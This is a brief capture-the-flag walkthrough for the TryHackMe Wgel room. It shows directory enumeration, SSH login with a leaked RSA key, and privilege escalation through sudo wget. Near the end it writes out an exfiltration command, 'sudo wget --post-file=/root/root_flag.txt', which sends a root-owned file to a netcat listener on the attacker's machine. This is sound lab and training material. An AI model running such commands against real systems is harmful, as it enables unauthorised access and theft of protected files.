Wgel CTF TryHackMe Walkthrough
My target IP is, you should change it to yours to execute commands.
gobuster dir -u -w gobusterDir.txt
Lets search for aswell.
Looks like we’ve found a RSA key.
Website Inspection
There is an Apache default page at the IP address. However, I saw this while viewing source code:
Seems like username for SSH is Jessie.
Well, key is not encrypted so we can connect directly. I will save the key to a file named rsaid and give it 600 permissions.
chmod 600 rsaid
Now we can connect using the key.
ssh -i 'rsaid' jessie@
User Flag
I will search around a bit.
Root Flag
First, lets see if we can use some commands.
sudo -l
It allows us to use wget command so lets see what we can find about it at gtfobins.
We can upload root flag to our local machine.
I will start listening any port i want with netcat. 4444 is the port i chose.
nc -lvnp 4444
Now we can use the command we saw at gtfobins.
sudo wget --post-file=/root/root_flag.txt
Note that is my IP. Therefore, you should change it to yours.
Netcat captured the flag.